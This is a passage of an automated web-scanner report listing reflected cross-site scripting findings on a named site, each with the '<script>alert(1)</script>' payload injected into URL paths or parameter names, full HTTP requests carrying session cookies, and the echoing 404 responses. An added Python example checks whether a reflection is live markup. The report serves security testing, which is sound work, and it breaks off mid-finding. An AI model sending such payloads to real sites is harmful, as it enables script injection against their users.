Date: Wed, 17 Nov 2010 22:56:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosc41b5<script>alert(1)</script>f9c754841ca/images/template_24.gif/ was not found on this server.</p>
...[SNIP]...

2.4795. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/template_24.gif/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1fc7b<script>alert(1)</script>21162949ae4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images1fc7b<script>alert(1)</script>21162949ae4/template_24.gif/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:57:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images1fc7b<script>alert(1)</script>21162949ae4/template_24.gif/ was not found on this server.</p>
...[SNIP]...

2.4796. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/template_24.gif/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcfdf<script>alert(1)</script>187b65f567b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images/template_24.gifdcfdf<script>alert(1)</script>187b65f567b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:57:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images/template_24.gifdcfdf<script>alert(1)</script>187b65f567b/ was not found on this server.</p>
...[SNIP]...

2.4797. http://www.resellerbase.com/themes/kosmos/json.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/json.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3028a<script>alert(1)</script>a124c65a16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes3028a<script>alert(1)</script>a124c65a16b/kosmos/json.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes3028a<script>alert(1)</script>a124c65a16b/kosmos/json.js was not found on this server.</p>
...[SNIP]...

2.4798. http://www.resellerbase.com/themes/kosmos/json.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/json.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 615ea<script>alert(1)</script>9b183fa9121 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos615ea<script>alert(1)</script>9b183fa9121/json.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos615ea<script>alert(1)</script>9b183fa9121/json.js was not found on this server.</p>
...[SNIP]...

2.4799. http://www.resellerbase.com/themes/kosmos/json.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/json.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5786e<script>alert(1)</script>bbc1a4db582 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/json.js5786e<script>alert(1)</script>bbc1a4db582 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/json.js5786e<script>alert(1)</script>bbc1a4db582 was not found on this server.</p>
...[SNIP]...

2.4800. http://www.resellerbase.com/themes/kosmos/styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b6f4<script>alert(1)</script>53f99ec3077 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes3b6f4<script>alert(1)</script>53f99ec3077/kosmos/styles.css HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes3b6f4<script>alert(1)</script>53f99ec3077/kosmos/styles.css was not found on this server.</p>
...[SNIP]...

2.4801. http://www.resellerbase.com/themes/kosmos/styles.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/styles.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5306<script>alert(1)</script>bf0f2de63bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosb5306<script>alert(1)</script>bf0f2de63bb/styles.css HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosb5306<script>alert(1)</script>bf0f2de63bb/styles.css was not found on this server.</p>
...[SNIP]...

2.4802. http://www.resellerbase.com/themes/kosmos/styles.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/styles.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cbb60<script>alert(1)</script>ffbf1428aab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/styles.csscbb60<script>alert(1)</script>ffbf1428aab HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/styles.csscbb60<script>alert(1)</script>ffbf1428aab was not found on this server.</p>
...[SNIP]...

2.4803. http://www.resellerbase.com/themes/kosmos/trackclick.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/trackclick.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7519<script>alert(1)</script>7091e5da24f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesa7519<script>alert(1)</script>7091e5da24f/kosmos/trackclick.js HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/new.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesa7519<script>alert(1)</script>7091e5da24f/kosmos/trackclick.js was not found on this server.</p>
...[SNIP]...

2.4804. http://www.resellerbase.com/themes/kosmos/trackclick.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/trackclick.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ee48<script>alert(1)</script>ea36ea8bf52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos4ee48<script>alert(1)</script>ea36ea8bf52/trackclick.js HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/new.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos4ee48<script>alert(1)</script>ea36ea8bf52/trackclick.js was not found on this server.</p>
...[SNIP]...

2.4805. http://www.resellerbase.com/themes/kosmos/trackclick.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/trackclick.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload becf4<script>alert(1)</script>a15883f62a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/trackclick.jsbecf4<script>alert(1)</script>a15883f62a HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/new.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/trackclick.jsbecf4<script>alert(1)</script>a15883f62a was not found on this server.</p>
...[SNIP]...

2.4806. http://www.resellerbase.com/top.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /top.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cb96<script>alert(1)</script>335f22e045b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top.php1cb96<script>alert(1)</script>335f22e045b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/rss.php?type=top
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /top.php1cb96<script>alert(1)</script>335f22e045b was not found on this server.</p>
...[SNIP]...
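
Most of the findings in this part of the report, this one included, are the same pattern: the request path is copied unescaped into the "The requested URL ... was not found" paragraph of the site's 404 page, so any markup placed in the path comes back as live HTML. The script below is an added example, not code from the report or from the scanned application. It reproduces the check behind the "echoed unmodified ... as plain text between tags" verdict: wrap markup in random prefix and suffix tokens, look for the tokens in the response, and then decide whether the markup between them was parsed as HTML rather than shown as text. The three response bodies are constructed for the example: the first is modelled on the 404 body shown above, the other two are hypothetical variants of the same page (one that HTML-encodes the URL, one that echoes it inside an HTML comment). The function and constant names are this example's own. One caveat a reviewer would add to the "Certain" confidence rating: the reflected value is the raw request line, so delivering it through a link depends on the victim's browser sending `<` and `>` unencoded in the path, which is a browser canonicalisation question that the scanner's request (sent with an IE7 User-Agent string, not by a browser) does not answer.

```python
"""Check whether a scanner marker is echoed, and whether the echoed markup is live.

Added example, not code from the report or from the scanned application.
"""
from html.parser import HTMLParser

# Constructed sample responses (not captured traffic).
NOT_FOUND_BODY = (  # modelled on the 404 page in the report
    "<html><head><title>Error 404 - Page Not Found</title></head><body>"
    "<p>The requested URL /top.php1cb96<script>alert(1)</script>335f22e045b "
    "was not found on this server.</p></body></html>"
)
ENCODED_BODY = (  # hypothetical: the same page with the URL HTML-encoded
    "<html><body><p>The requested URL /top.php1cb96&lt;script&gt;alert(1)&lt;/script&gt;335f22e045b "
    "was not found on this server.</p></body></html>"
)
COMMENT_BODY = (  # hypothetical: the URL is echoed inside an HTML comment
    "<html><body><!-- requested: /top.php1cb96<script>alert(1)</script>335f22e045b -->"
    "<p>Not found.</p></body></html>"
)


class _MarkupCollector(HTMLParser):
    """Record every start tag (with sorted attributes) and the text of every <script> element."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.script_bodies = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, tuple(sorted(attrs))))
        if tag == "script":
            self._in_script = True

    handle_startendtag = handle_starttag

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_bodies.append(data.strip())


def collect_markup(fragment):
    """Parse a fragment and return the collector holding its tags and script bodies."""
    parser = _MarkupCollector()
    parser.feed(fragment)
    parser.close()
    return parser


def classify_reflection(body, prefix, markup, suffix):
    """Locate prefix...suffix in body and report how the markup between them came back.

    reflected: both tokens were found; echoed: the raw text between them;
    modified: echoed differs from what was sent (encoding, escaping, truncation);
    live: every tag and script body of the payload shows up in the parsed
    response, so a parser treats it as markup, not as text or comment content.
    html.parser is not a browser-grade parser; confirm contexts such as
    <title> or <textarea> in a real browser before calling them exploitable.
    """
    start = body.find(prefix)
    end = body.find(suffix, start + len(prefix)) if start >= 0 else -1
    if start < 0 or end < 0:
        return {"reflected": False, "echoed": None, "modified": None, "live": False}
    echoed = body[start + len(prefix):end]
    wanted = collect_markup(markup)
    got = collect_markup(body)
    live = (bool(wanted.tags or wanted.script_bodies)
            and all(t in got.tags for t in wanted.tags)
            and all(s in got.script_bodies for s in wanted.script_bodies))
    return {"reflected": True, "echoed": echoed, "modified": echoed != markup, "live": live}


if __name__ == "__main__":
    for name, body in (("404 page", NOT_FOUND_BODY), ("encoded", ENCODED_BODY), ("comment", COMMENT_BODY)):
        print(name, classify_reflection(body, "1cb96", "<script>alert(1)</script>", "335f22e045b"))
```

Run against the three bodies, the 404 page comes back reflected, unmodified and live; the encoded variant is reflected but modified and not live; the comment variant is reflected and unmodified but not live, which is the case a plain substring match gets wrong.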

2.4807. http://www.resellerbase.com/top.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /top.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9dbf8<script>alert(1)</script>1bb639f171a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top.php?9dbf8<script>alert(1)</script>1bb639f171a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/rss.php?type=top
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /top.php?9dbf8<script>alert(1)</script>1bb639f171a=1 was not found on this server.</p>
...[SNIP]...

2.4808. http://www.resellerbase.com/top_rated.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /top_rated.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7295<script>alert(1)</script>deab4c86f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top_rated.phpa7295<script>alert(1)</script>deab4c86f19 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /top_rated.phpa7295<script>alert(1)</script>deab4c86f19 was not found on this server.</p>
...[SNIP]...

2.4809. http://www.resellerbase.com/trackclick.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /trackclick.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b75b<script>alert(1)</script>54dc6de84e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackclick.php8b75b<script>alert(1)</script>54dc6de84e9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /trackclick.php8b75b<script>alert(1)</script>54dc6de84e9 was not found on this server.</p>
...[SNIP]...

2.4810. http://www.resellerbase.com/trackclick.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /trackclick.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4e10b<script>alert(1)</script>97961a1ead2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackclick.php4e10b<script>alert(1)</script>97961a1ead2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /trackclick.php4e10b<script>alert(1)</script>97961a1ead2/ was not found on this server.</p>
...[SNIP]...

2.4811. http://www.resellerbase.com/travel-vaccation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a6ed7<script>alert(1)</script>2c6a8f8318aa7ea05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /travel-vaccationa6ed7<script>alert(1)</script>2c6a8f8318aa7ea05/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

